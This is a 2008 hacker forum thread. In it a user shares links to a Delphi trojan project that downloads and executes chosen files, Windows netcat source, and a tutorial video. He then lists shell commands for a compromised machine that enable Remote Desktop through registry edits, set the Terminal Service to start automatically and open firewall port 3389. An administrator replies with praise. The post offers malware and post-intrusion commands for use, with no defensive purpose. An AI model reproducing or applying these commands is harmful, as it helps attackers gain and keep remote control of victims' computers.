Author Topic: TrooT  (Read 1402 times)

Offline tully

  • Junior Phone Loser
  • **
  • Posts: 39
  • 1337 13V3L: +12/-6
TrooT
« on: October 14, 2008, 09:38:25 PM »
I made a simple video tutorial covering downloading and executing files of your choice in delphi, here are the links for the files

———————

the rar which contains the project files

http://tully.projm.org/delphi/delphitrojan.rar

———————

the windows netcat source

http://tully.projm.org/delphi/nc.zip

———————

and the tutorial on how to do everything

http://tully.projm.org/delphi/delphitrojan.swf

——————-

how to enable rdp via shell, once u get teh connection enter these commands

reg add “hklm\system\currentControlSet\Control\Terminal Server” /v “AllowTSConnections” /t REG_DWORD /d 0×1 /f

————

reg add “hklm\system\currentControlSet\Control\Terminal Server” /v “fDenyTSConnections” /t REG_DWORD /d 0×0 /f

———–

sc config TermService start= auto

———–
net start Termservice

———-
netsh.exe

———-
firewall

———-
add portopening TCP 3389 “Remote Desktop”

———

enjoy

Offline trevelyn

  • Administrator
  • Elite Cactus Squad
  • Ninja Phone Loser
  • *****
  • Posts: 1687
  • 1337 13V3L: +183/-22
  • He likes cans and taking pictures in cans!
    • WeakNet Labs
Re: TrooT
« Reply #1 on: October 16, 2008, 05:32:56 PM »
whoa. nice.